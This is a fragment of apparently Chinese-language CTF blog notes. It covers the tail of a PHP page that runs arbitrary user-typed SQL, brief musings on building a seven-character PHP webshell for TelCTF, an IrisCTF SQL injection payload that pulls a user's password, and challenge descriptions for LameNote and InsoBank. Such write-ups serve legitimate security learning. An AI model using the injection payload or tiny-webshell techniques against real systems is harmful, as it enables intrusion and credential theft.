$pdo-&gt;setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $_SESSION[&#39;dsn&#39;]=$dsn; $_SESSION[&#39;db_username&#39;]=$db_username; $_SESSION[&#39;db_password&#39;]=$db_password; } catch (Exception $e) { die($e-&gt;getMessage()); } } if(!isset($_SESSION[&#39;dsn&#39;])){ die(&#34;&lt;script&gt;alert(&#39;请先连接数据库&#39;);window.location.href=&#39;index.php&#39;&lt;/script&gt;&#34;); } ?&gt; &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;执行数据库命令&lt;/title&gt; &lt;link rel=&#34;stylesheet&#34; type=&#34;text/css&#34; href=&#34;style.css&#34;&gt; &lt;/head&gt; &lt;body&gt; &lt;div class=&#34;container&#34;&gt; &lt;h1&gt;执行数据库命令&lt;/h1&gt; &lt;form action=&#34;query.php&#34; method=&#34;post&#34;&gt; &lt;div class=&#34;form-group&#34;&gt; &lt;label for=&#34;db_command&#34;&gt;MySQL命令：&lt;/label&gt; &lt;input type=&#34;text&#34; id=&#34;db_command&#34; name=&#34;db_command&#34; style=&#34;width: 500px;&#34; required&gt; &lt;/div&gt; &lt;div class=&#34;form-group&#34;&gt; &lt;button type=&#34;submit&#34;&gt;执行命令&lt;/button&gt; &lt;/div&gt; &lt;/form&gt; &lt;div class=&#34;result&#34;&gt; &lt;?php if (isset($_POST[&#39;db_command&#39;])) { $db_command = $_POST[&#34;db_command&#34;]; $dsn=$_SESSION[&#39;dsn&#39;]; $db_username = $_SESSION[&#39;db_username&#39;]; $db_password = $_SESSION[&#39;db_password&#39;]; try { $pdo = new PDO($dsn, $db_username, $db_password,array(PDO::MYSQL_ATTR_LOCAL_INFILE =&gt; true)); $pdo-&gt;setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $stmt = $pdo-&gt;prepare($db_command); $stmt-&gt;execute(); $result = $stmt-&gt;fetchAll(PDO::FETCH_ASSOC); if ($result) { echo &#34;&lt;h2&gt;执行结果：&lt;/h2&gt;&#34;; echo &#34;&lt;table&gt;&#34;; echo &#34;&lt;tr&gt;&#34;; foreach (array_keys($result[0]) as $column) { echo &#34;&lt;th&gt;$column&lt;/th&gt;&#34;; } echo &#34;&lt;/tr&gt;&#34;; foreach ($result as $row) { echo &#34;&lt;tr&gt;&#34;; foreach ($row as $value) { echo &#34;&lt;td&gt;$value&lt;/td&gt;&#34;; } echo &#34;&lt;/tr&gt;&#34;; } echo &#34;&lt;/table&gt;&#34;; } else { echo &#34;&lt;p&gt;没有结果返回。&lt;/p&gt;&#34;; } } catch (Exception $e) { echo &#34;&lt;p class=&#39;error-message&#39;&gt;执行错误：&#34; . $e-&gt;getMessage() . &#34;&lt;/p&gt;&#34;; } } ?&gt; &lt;/div&gt; &lt;/div&gt; &lt;/body&gt; &lt;/html&gt; </code></pre><p>eeee 没啥用</p> <p>直接读flag&mdash;&mdash;&mdash;明明说是sql结果flag不在数据库里面</p>/posts/telctf/Mon, 05 Feb 2024 00:45:06 +0800/posts/telctf/<h1 id="stress-release-service"><strong>Stress Release Service</strong></h1> <h2 id="stress-release-service-1"><strong>Stress Release Service:</strong></h2> <pre tabindex="0"><code>Chall name: - Stress Release Service Category: - Misc / Web Author: - tsug0d Description: For a better New Year, we are introducing a service that can help you reduce stress: &lt;http://192.53.173.71:8080&gt; . As our service is only available during the New Year, we are also providing you with a code for later use in material section. </code></pre><p><a href="https://prod-files-secure.s3.us-west-2.amazonaws.com/c378b070-6063-4137-81ee-f75f82009b81/8d78a98b-0a45-4355-a471-4e5956cf6fe5/StressReleaseService__give.zip">StressReleaseService__give.zip</a></p> <p>It is using <code>preg_match</code> to validate.</p> <p>为啥是misc题啊</p> <p>限制7个字符长度，可能需要点脑洞吧（</p> <p>tiniest php webshell?</p> <p><a href="https://www.pentestpartners.com/security-blog/the-tiniest-php-system-shell-ever/">https://www.pentestpartners.com/security-blog/the-tiniest-php-system-shell-ever/</a></p> <p>抽象，反引号或者想办法传参？</p> <p><a href="https://prod-files-secure.s3.us-west-2.amazonaws.com/c378b070-6063-4137-81ee-f75f82009b81/302a6103-2a30-446e-aba4-8686bf154b39/Untitled.txt">CTFshow_rce极限大挑战</a></p> <p>他不限制在7个字符可以看下面这张图<img src="/image-20240204224839567-1707065135959-1.png" alt="../TelCTF/image-20240204224839567"></p>/posts/rw-be/Mon, 05 Feb 2024 00:42:37 +0800/posts/rw-be/<h1 id="be-a-security-researcher">Be-a-Security-Researcher</h1> <p>开局login</p>/posts/irisctf/Mon, 05 Feb 2024 00:39:11 +0800/posts/irisctf/<h2 id="whats-my-password">What&rsquo;s My Password</h2> <p>sql injection</p> <pre tabindex="0"><code>{&#34;username&#34;:&#34;skat&#34;,&#34;password&#34;:&#34;\&#34; union select username,password from users where username=\&#34;skat\&#34;#&#34;} </code></pre><h2 id="lamenote">LameNote</h2> <pre tabindex="0"><code>Note challenges are lame so I made a lamer one. Flag matches irisctf{[a-z_]+} Admin will log in, make a note with the flag, then visit your link. (Sorry if the timeout is a bit broken on this challenge, there&#39;s no PoW on the admin bot so feel free to spam it a bit) nc lamenote-adminbot.chal.irisc.tf 10300 Hint! Please redownload if you downloaded server files at the start of the event. </code></pre><p><a href="https://prod-files-secure.s3.us-west-2.amazonaws.com/c378b070-6063-4137-81ee-f75f82009b81/e71696da-6929-44f6-843a-ade7f472026a/lamenote.tar.gz">lamenote.tar.gz</a></p>/posts/insomni-hack/Mon, 05 Feb 2024 00:00:09 +0800/posts/insomni-hack/<h2 id="insobank">InsoBank</h2> <pre tabindex="0"><code>by clZ We&#39;re launching a new online Bank today which is of course backed by crypto and AI which makes it better than any other banking system out there. It&#39;s not fully featured yet as you can only transfer money within your own accounts, but you can already see how superior it is to other systems: http://91.92.201.197:3000/ Source: here </code></pre><pre tabindex="0"><code>for (accountid,name,balance) in cursor.fetchall(): if balance &gt; 13.37: results[accountid] = {&#39;name&#39;: name, &#39;balance&#39;: balance, &#39;flag&#39;: FLAG} </code></pre>